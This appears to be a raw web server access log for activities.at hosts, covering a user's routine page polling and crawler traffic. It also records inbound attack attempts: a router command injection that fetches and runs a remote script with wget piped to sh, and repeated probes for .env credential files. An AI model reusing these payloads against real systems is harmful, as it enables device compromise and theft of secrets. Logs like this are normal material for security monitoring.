178.115.42.220 - - [02/Dec/2024:08:46:49 +0100] "GET /gui/javascript/form_form.js?1733125609 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125548" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [02/Dec/2024:08:47:28 +0100] "GET /renault.activities.at/htdocs/binaries/10223415.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:08:47:49 +0100] "GET /entry.php?id=10271&&ser=125609 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125548" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:47:49 +0100] "GET /gui/javascript/form_form.js?1733125669 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:48:49 +0100] "GET /entry.php?id=10271&&ser=125669 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:48:49 +0100] "GET /gui/javascript/form_form.js?1733125729 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:49:50 +0100] "GET /entry.php?id=10271&&ser=125729 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:49:50 +0100] "GET /gui/javascript/form_form.js?1733125790 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125729" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:50:50 +0100] "GET /entry.php?id=10271&&ser=125790 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125729" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:50:50 +0100] "GET /gui/javascript/form_form.js?1733125850 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:51:51 +0100] "GET /entry.php?id=10271&&ser=125850 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:51:51 +0100] "GET /gui/javascript/form_form.js?1733125911 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125850" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:52:51 +0100] "GET /entry.php?id=10271&&ser=125911 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125850" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:52:51 +0100] "GET /gui/javascript/form_form.js?1733125971 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125911" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:53:51 +0100] "GET /entry.php?id=10271&&ser=125971 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125911" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:53:52 +0100] "GET /gui/javascript/form_form.js?1733126032 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=125971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:54:52 +0100] "GET /entry.php?id=10271&&ser=126032 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=125971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:54:52 +0100] "GET /gui/javascript/form_form.js?1733126092 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126032" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:55:52 +0100] "GET /entry.php?id=10271&&ser=126092 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126032" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:55:52 +0100] "GET /gui/javascript/form_form.js?1733126152 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126092" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:56:53 +0100] "GET /entry.php?id=10271&&ser=126152 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126092" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:56:53 +0100] "GET /gui/javascript/form_form.js?1733126213 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:57:53 +0100] "GET /entry.php?id=10271&&ser=126213 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:57:53 +0100] "GET /gui/javascript/form_form.js?1733126273 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126213" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:58:53 +0100] "GET /entry.php?id=10271&&ser=126273 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126213" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:58:53 +0100] "GET /gui/javascript/form_form.js?1733126333 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:59:54 +0100] "GET /entry.php?id=10271&&ser=126333 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:08:59:54 +0100] "GET /gui/javascript/form_form.js?1733126394 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126333" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:00:54 +0100] "GET /entry.php?id=10271&&ser=126394 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126333" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:00:54 +0100] "GET /gui/javascript/form_form.js?1733126454 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126394" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:01:54 +0100] "GET /entry.php?id=10271&&ser=126454 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126394" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:01:55 +0100] "GET /gui/javascript/form_form.js?1733126515 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126454" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:02:55 +0100] "GET /entry.php?id=10271&&ser=126515 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126454" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:02:55 +0100] "GET /gui/javascript/form_form.js?1733126575 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126515" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:03:55 +0100] "GET /entry.php?id=10271&&ser=126575 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126515" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:03:55 +0100] "GET /gui/javascript/form_form.js?1733126635 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126575" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:04:56 +0100] "GET /entry.php?id=10271&&ser=126635 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126575" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:04:56 +0100] "GET /gui/javascript/form_form.js?1733126696 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126635" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:06:00 +0100] "GET /entry.php?id=10271&&ser=126696 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126635" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:06:00 +0100] "GET /gui/javascript/form_form.js?1733126760 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126696" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:07:04 +0100] "GET /entry.php?id=10271&&ser=126760 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126696" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:07:04 +0100] "GET /gui/javascript/form_form.js?1733126824 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [02/Dec/2024:09:07:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008051103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:09:08:09 +0100] "GET /entry.php?id=10271&&ser=126824 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126760" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:08:09 +0100] "GET /gui/javascript/form_form.js?1733126889 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126824" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:09:13 +0100] "GET /entry.php?id=10271&&ser=126889 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=126824" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [02/Dec/2024:09:09:13 +0100] "GET /gui/javascript/form_form.js?1733126953 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=126889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [02/Dec/2024:09:11:30 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image026.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [02/Dec/2024:09:15:30 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912131403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.34.240.137 - - [02/Dec/2024:09:15:43 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.136 - - [02/Dec/2024:09:19:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909181603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [02/Dec/2024:09:23:31 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/vblank.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [02/Dec/2024:09:27:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107071503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.50.16.198 - - [02/Dec/2024:09:27:37 +0100] "GET / HTTP/1.1" 200 423 "-" "Linux Gnu (cow)"
125.228.50.59 - - [02/Dec/2024:09:40:54 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [02/Dec/2024:09:51:33 +0100] "GET /ed-test.2web.at/stats/lang/awstats-es.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [02/Dec/2024:09:54:36 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.135 - - [02/Dec/2024:09:56:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908281403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.88 - - [02/Dec/2024:09:59:45 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.135 - - [02/Dec/2024:10:02:32 +0100] "GET /ed-test.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [02/Dec/2024:10:05:11 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [02/Dec/2024:10:06:33 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105071203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [02/Dec/2024:10:10:33 +0100] "GET /renault.activities.at/htdocs/binaries/10377529.pdf HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.50 - - [02/Dec/2024:10:24:15 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36"
87.120.115.50 - - [02/Dec/2024:10:31:31 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
81.161.238.40 - - [02/Dec/2024:10:33:50 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true"
81.161.238.40 - - [02/Dec/2024:10:37:22 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36"
141.98.11.35 - - [02/Dec/2024:10:38:05 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.147.124.104 - - [02/Dec/2024:10:39:46 +0100] "\x03" 400 383 "-" "-"
156.59.198.136 - - [02/Dec/2024:10:48:01 +0100] "GET /ed-test.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [02/Dec/2024:10:52:01 +0100] "GET /renault.activities.at/htdocs/binaries/10130681.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
184.162.5.79 - - [02/Dec/2024:10:55:15 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
178.115.42.220 - - [02/Dec/2024:11:01:49 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /gui/javascript/form_form.js?1733133710 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /gui/javascript/form_form.js?1733133710 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /gui/javascript/form_form.js?1733133710 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /gui/javascript/form_form.js?1733133710 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2410 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:50 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:51 +0100] "GET /gui/javascript/form_form.js?1733133711 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:51 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:51 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:01:57 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1967 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:00 +0100] "GET /gui/javascript/form_form.js?1733133780 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:00 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:00 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2010 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:01 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:01 +0100] "GET /gui/javascript/form_form.js?1733133781 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:01 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:03:01 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:04:01 +0100] "GET /entry.php?id=10271&&ser=133780 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:04:01 +0100] "GET /gui/javascript/form_form.js?1733133841 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=133780" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
156.59.198.136 - - [02/Dec/2024:11:04:02 +0100] "GET /ed-test.2web.at/stats/lang/awstats-pt.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [02/Dec/2024:11:05:01 +0100] "GET /entry.php?id=10271&&ser=133841 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=133780" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [02/Dec/2024:11:05:01 +0100] "GET /gui/javascript/form_form.js?1733133901 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=133841" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
